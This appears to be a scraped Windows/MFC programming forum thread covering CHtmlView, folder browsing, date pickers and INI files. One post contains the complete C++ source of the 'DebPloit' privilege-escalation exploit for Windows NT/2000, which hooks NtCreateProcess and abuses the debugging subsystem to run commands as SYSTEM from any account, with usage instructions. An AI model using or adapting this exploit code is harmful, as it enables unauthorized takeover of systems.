|
Thanks again.
I overcame this issue by navigating to about:blank in my OnInitialUpdate(...) before I try to populate the control
Nish
If I am awake and my eyes are closed, it does not necessarily mean that I am thinking of naked women.
|
|
|
|
|
Hello,
I hope everybody heard about the new vulnerability called DebPloit in Windows NT and Windows 2000. I've written small example that shows how you can obtain administrative privileges when your code is running under non-privileged account.
// debploit.cpp (Windows NT/2000)
//
// This program creates a process in the security context of the SYSTEM user.
// It uses a security hole in the Windows NT/2000 debugging subsystem
// originally discovered by Radim "EliCZ" Picha (March 9, 2002).
//
// You can have any privileges (you can be even Guest!) to execute this program
// and become an administrator of the local system.
//
// More information about this security hole can be found at http://www.anticracking.sk/EliCZ
// Microsoft was informed but still didn't release any hotfix (April 6, 2002).
// There is an unofficial hotfix that closes this security hole, you can download it from
// http://www.protect-me.com/freeware.html
//
//
// To link this program, you should have NTDLL.LIB from the DDK.
//
// (c) 2002 Ashot Oganesyan (ashot@protect-me.com)
// (c) 2002 SmartLine, Inc. (http://www.protect-me.com)
#include <windows.h>
#include <stdio.h>
#include <tchar.h>
typedef LONG NTSTATUS;
#define NTAPI __stdcall
#define NT_SUCCESS(Status) ((LONG)(Status) >= 0)
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define DBG_SS_API_PORT_NAME L"\\DbgSsApiPort"
#define SS_CREATE_PROCESS_REQUEST 2
#define MAX_DBG_SS_CP_LPC_MESSAGE_SIZE 0x80
#define DBG_SS_CP_LPC_DATA_SIZE 0x38
#pragma pack(1)
typedef struct _ASMJUMP
{
BYTE mov_eax;
LPVOID address;
WORD jump_eax;
} ASMJUMP, *PASMJUMP;
#pragma pack()
typedef struct _CLIENT_ID
{
HANDLE UniqueProcess;
HANDLE UniqueThread;
} CLIENT_ID, *PCLIENT_ID;
typedef struct _PORT_MESSAGE {
USHORT DataSize;
USHORT MessageSize;
USHORT MessageType;
USHORT VirtualRangesOffset;
CLIENT_ID CallerId;
ULONG MessageId;
ULONG SectionSize;
ULONG DebugEventCode;
ULONG Status;
CLIENT_ID DebuggeeId;
PVOID DbgSsKmMsg;
CLIENT_ID DebuggerId;
DWORD Unknown;
HANDLE hFile;
LPVOID ImageBase;
ULONG DebugInfoFileOffset;
ULONG DebugInfoSize;
LPVOID ThreadLocalBase;
LPTHREAD_START_ROUTINE ThreadStartAddress;
LPVOID ImageName;
USHORT Unicode;
USHORT wImageName[(MAX_DBG_SS_CP_LPC_MESSAGE_SIZE - 0x56) / sizeof(USHORT)];
} PORT_MESSAGE, *PPORT_MESSAGE;
typedef struct _PORT_SECTION_WRITE {
ULONG Length;
HANDLE SectionHandle;
ULONG SectionOffset;
ULONG ViewSize;
PVOID ViewBase;
PVOID TargetViewBase;
} PORT_SECTION_WRITE, *PPORT_SECTION_WRITE;
typedef struct _PORT_SECTION_READ {
ULONG Length;
ULONG ViewSize;
ULONG ViewBase;
} PORT_SECTION_READ, *PPORT_SECTION_READ;
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
#ifdef __cplusplus
extern "C" {
#endif
NTSYSAPI
VOID
NTAPI
RtlInitUnicodeString (
OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);
NTSYSAPI
NTSTATUS
NTAPI
NtConnectPort(
OUT PHANDLE PortHandle,
IN PUNICODE_STRING PortName,
IN PSECURITY_QUALITY_OF_SERVICE SecurityQos,
IN OUT PPORT_SECTION_WRITE WriteSection OPTIONAL,
IN OUT PPORT_SECTION_READ ReadSection OPTIONAL,
OUT PULONG MaxMessageSize OPTIONAL,
IN OUT PVOID ConnectData OPTIONAL,
IN OUT PULONG ConnectDataLength OPTIONAL
);
NTSYSAPI
NTSTATUS
NTAPI
DbgUiConnectToDbg(VOID);
NTSYSAPI
NTSTATUS
NTAPI
NtRequestPort(
IN HANDLE PortHandle,
IN PPORT_MESSAGE RequestMessage
);
NTSYSAPI
NTSTATUS
NTAPI
NtClose(
IN HANDLE hObject
);
NTSYSAPI
ULONG
NTAPI
RtlNtStatusToDosError(
NTSTATUS status
);
#ifdef __cplusplus
}
#endif
HANDLE g_hParentProc;
DWORD g_dwFunc;
// Hooked NtCreateProcess
void __declspec(naked)HookedNtCreateProcess()
{
_asm
{
mov eax,g_hParentProc // change parent's process handle
mov dword ptr [esp + 16],eax
mov eax,g_dwFunc // value depends on OS version
lea edx,dword ptr [esp + 4]
int 2Eh
retn 20h
}
}
HANDLE StealProcessHandle(DWORD dwPid)
{
HANDLE hProcess = NULL,
hDbgSsApiPort = NULL;
SECURITY_QUALITY_OF_SERVICE Qos;
UNICODE_STRING usDbgSsApiPort;
PORT_MESSAGE PortMessage;
DEBUG_EVENT DebugEvent;
NTSTATUS Status = STATUS_SUCCESS;
Qos.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);
Qos.ImpersonationLevel = SecurityImpersonation;
Qos.ContextTrackingMode = SECURITY_DYNAMIC_TRACKING;
Qos.EffectiveOnly = TRUE;
RtlInitUnicodeString(&usDbgSsApiPort,DBG_SS_API_PORT_NAME);
// Connect to DbgSsApiPort
Status = NtConnectPort(&hDbgSsApiPort,&usDbgSsApiPort,&Qos,NULL,NULL,NULL,NULL,NULL);
if (!NT_SUCCESS(Status))
goto cleanup;
Status = DbgUiConnectToDbg();
if (!NT_SUCCESS(Status))
goto cleanup;
ZeroMemory(&PortMessage,sizeof(PORT_MESSAGE));
PortMessage.DataSize = DBG_SS_CP_LPC_DATA_SIZE;
PortMessage.MessageSize = sizeof(PORT_MESSAGE);
PortMessage.DebugEventCode = SS_CREATE_PROCESS_REQUEST;
PortMessage.DebuggeeId.UniqueProcess = (HANDLE)dwPid;
PortMessage.DebuggerId.UniqueProcess = (HANDLE)GetCurrentProcessId();
PortMessage.DebuggerId.UniqueThread = (HANDLE)GetCurrentThreadId();
Status = NtRequestPort(hDbgSsApiPort,&PortMessage);
if (!NT_SUCCESS(Status))
goto cleanup;
if (WaitForDebugEvent(&DebugEvent,1000) == FALSE)
goto cleanup;
if(DebugEvent.dwDebugEventCode != CREATE_PROCESS_DEBUG_EVENT || DebugEvent.u.CreateProcessInfo.hProcess == NULL)
goto cleanup;
// Duplicate the handle to get full access to it
DuplicateHandle(DebugEvent.u.CreateProcessInfo.hProcess,GetCurrentProcess(),GetCurrentProcess(),&hProcess,0,FALSE,DUPLICATE_SAME_ACCESS);
CloseHandle(DebugEvent.u.CreateProcessInfo.hProcess);
cleanup:
if (hDbgSsApiPort)
NtClose(hDbgSsApiPort);
if (!NT_SUCCESS(Status))
SetLastError(RtlNtStatusToDosError(Status));
return hProcess;
}
int _tmain(int argc, TCHAR* argv[])
{
UINT ProcessId;
OSVERSIONINFO VersionInfo;
DWORD dw;
MEMORY_BASIC_INFORMATION mbi;
PROCESS_INFORMATION pi;
STARTUPINFO si;
PASMJUMP NtCreateProcessHook;
LPTSTR lpProgramToExecute;
BOOL bWaitForParent = FALSE;
// Get OS version
VersionInfo.dwOSVersionInfoSize = sizeof(VersionInfo);
GetVersionEx(&VersionInfo);
// DebPloit works only on NT/W2K
if ( !(VersionInfo.dwPlatformId & VER_PLATFORM_WIN32_NT) || (VersionInfo.dwMajorVersion == 5 && VersionInfo.dwMinorVersion != 0) )
{
printf(TEXT("This program works only on Windows NT/2000\n"));
return -1;
}
if (argc < 2)
{
printf("\nUsage:\n\t DebPloit.exe [Parent PID] <Command Line>\n\n");
printf("Parent PID - parent process (if not specified - system process will be used)\n");
printf("Command Line - program to execute in the security context of Parent PID\n\n");
printf("Example:\n\t DebPloit.exe cmd\n");
printf("\t DebPloit.exe 123 cmd\n");
return -1;
}
// Get PID of the system process and the NtCreateProcess's number
switch(VersionInfo.dwMajorVersion)
{
case 3: // NT 3.51
ProcessId = 0x02;
g_dwFunc = 0x1E;
break;
case 4: // NT 4.0
ProcessId = 0x02;
g_dwFunc = 0x1F;
break;
case 5: // W2K
ProcessId = 0x08;
g_dwFunc = 0x29; // 0x2A - for W2K beta;
break;
}
if (argc > 2)
{
_stscanf(argv[1],TEXT("%lu"),&dw);
if (dw == 0)
{
printf("Invalid Parent PID specified!\n");
return -1;
}
lpProgramToExecute = argv[2];
if (dw != ProcessId)
bWaitForParent = TRUE;
ProcessId = dw;
}
else
lpProgramToExecute = argv[1];
// Get a pointer to NtCreateProcess
NtCreateProcessHook = (PASMJUMP)GetProcAddress(GetModuleHandle(TEXT("ntdll.dll")),"NtCreateProcess");
if (NtCreateProcessHook == NULL)
{
printf("GetProcAddress failed - %lu\n",GetLastError());
return -1;
}
// Enable write acess to NtCreateProcess in our own address space
VirtualQuery(NtCreateProcessHook,&mbi,sizeof(MEMORY_BASIC_INFORMATION));
VirtualProtect(mbi.AllocationBase,mbi.RegionSize,PAGE_EXECUTE_READWRITE,&dw);
// Redirect call to HookedNtCreateProcess:
//
// mov eax,HookedNtCreateProcess
// jmp eax
NtCreateProcessHook->mov_eax = 0xB8;
NtCreateProcessHook->address = HookedNtCreateProcess;
NtCreateProcessHook->jump_eax = 0xE0FF;
// Get a handle of the specified process
g_hParentProc = StealProcessHandle(ProcessId);
if (g_hParentProc == NULL)
{
printf("StealProcessHandle failed - %lu\n",GetLastError());
return -1;
}
ZeroMemory(&pi,sizeof(PROCESS_INFORMATION));
ZeroMemory(&si,sizeof(STARTUPINFO));
si.cb = sizeof(STARTUPINFO);
// Call modified CreateProcess (HookedNtCreateProcess will be called!)
if (CreateProcess(NULL,lpProgramToExecute,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi))
{
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
else
printf("CreateProcess failed - %lu\n",GetLastError());
// We must wait until the parent process terminates (if it's not a system process)
if (bWaitForParent)
{
FreeConsole();
WaitForSingleObject(g_hParentProc,INFINITE);
}
CloseHandle(g_hParentProc);
return 0;
}
You can also download full package from http://www.smartline.ru/software/DebPloitFix.zip
|
|
|
|
|
Hi
as far as i'm concerned, Microsoft has not release any patch to fix this security hole or did it???
|
|
|
|
|
No, he totally ignores this problem.
|
|
|
|
|
Just like the system popup.
I'm amumu, and you?
|
|
|
|
|
SHBrowseForFolder
Nish
If I am awake and my eyes are closed, it does not necessarily mean that I am thinking of naked women.
|
|
|
|
|
BROWSEINFO bi;
bi.hwndOwner = this->m_hWnd;
bi.pidlRoot = NULL;
bi.pszDisplayName = "pszDisplayName";
bi.lpszTitle = "lpszTitle";
bi.ulFlags |= BIF_BROWSEFORCOMPUTER |BIF_RETURNONLYFSDIRS ;
bi.lpfn = NULL;
ITEMIDLIST* pil = SHBrowseForFolder(&bi);
That's my code, when i click ok, it will be error
I'm amumu, and you?
|
|
|
|
|
|
I got it, thank you
I'm amumu, and you?
|
|
|
|
|
Hello all,
I need some help with CHtmlView.
What I need to achieve :- I am creatying an HTML file in memory and need to preview it to the user.
Current plan :- Create a temporary HTML file and open it in Internet Explorer
Alternate plan :- Create a frame window, with a CHtmlView and jump up this frame window. Now I need to transfer my in-memory HTML code into this CHtmlView. How do I do that please?
Warm regards
Buster
If I am awake and my eyes are closed, it does not necessarily mean that I am thinking of naked women.
|
|
|
|
|
So?
Nish
If I am awake and my eyes are closed, it does not necessarily mean that I am thinking of naked women.
|
|
|
|
|
I found that the easiest way was to create the temp html file and then navigate to that. There didn't seem to be an easier way to do it. I came across a few ideas in the ATL mailing list archives but nothing that seemed easy to implement.
Michael
|
|
|
|
|
If nothing else works I'll have to try that out
Nish
If I am awake and my eyes are closed, it does not necessarily mean that I am thinking of naked women.
|
|
|
|
|
If you want to load a HTML string from memory:
HRESULT hr;
IDispatch *pIDispatch = GetHtmlDocument();
IHTMLDocument2 *pIDoc;
IHTMLElement *pIBody;
hr = pIDispatch->QueryInterface(IID_IHTMLDocument2, (void**)&pIDoc);
hr = pIDoc->get_body(&pIBody);
hr = pIBody->put_innerHTML(_bstr_t("<b>Hello world</b>"));
(Error handling and clean up left as an exercise )
|
|
|
|
|
Thanks a lot
Nish
If I am awake and my eyes are closed, it does not necessarily mean that I am thinking of naked women.
|
|
|
|
|
hi
I used the datetimepicker control and I added a member variable for this control, but when i use UpdateData(); the problem occured with any date befor 1969-12-31. is it a bug in vc6? can I use this control for date before 1969-12-31 and how?
Best Regards
|
|
|
|
|
I use this control without any problems.
Even the year 1817 is reachable.
Your accompanying code must be teh problem.
Geert.
|
|
|
|
|
thanx
allways i got the following message:
(Debug Assertion failed!
program : file.exe
timecor.cpp
line:40)
this file (timecore.cpp)is done with vc6
Best Regards
|
|
|
|
|
So, what's on line 40 of timecor.cpp?
|
|
|
|
|
ASSERT(m_time != -1); // indicates an illegal input time
Best Regards
|
|
|
|
|
Hi,
Your problem is that the MFC CTime class actually uses the mktime() call internally. If you look at the definition of mktime() you'll see that it uses a time_t, which is a floating point value representing the number of seconds since, you guessed it, Jan 1 1970. The problem here is the fact that you're mapping your control to a CTime value. Open the ClassWizard and delete the mapped variable. Add it again, but make sure you select COleDateTime from the Variable Type combo. This should give you a much larger range of values.
Hope this helps.
------------------------
Derek Waters
derek@lj-oz.com
|
|
|
|
|
thanx
it is working now, does it work with date field of a access db?
Best Regards
|
|
|
|
|
Well, assuming that you're using some COM-based technology to access your Access DB (and I would imagine it'd be pretty tough otherwise!) then COleDateTime can easily be converted to a VARIANT of VT_DATE type using COleVariant. This will be exactly the format that Access's automation interface will be expecting.
------------------------
Derek Waters
derek@lj-oz.com
|
|
|
|
|
Hi CP adepts,
By using WriteProfileXXX() you can easily save some settings of your app
to the registry OR an INI file.
But if I choose for an INI file it is always created in the %windows% directory.
I'd like to keep it in the same directory as my app.
How can I become such a behaviour?
(without having to move it around myself of course)
Thanks.
|
|
|
|
|
You can use WritePrivateProfileXXX() which allows you to specify the path to the INI file.
|
|
|
|
|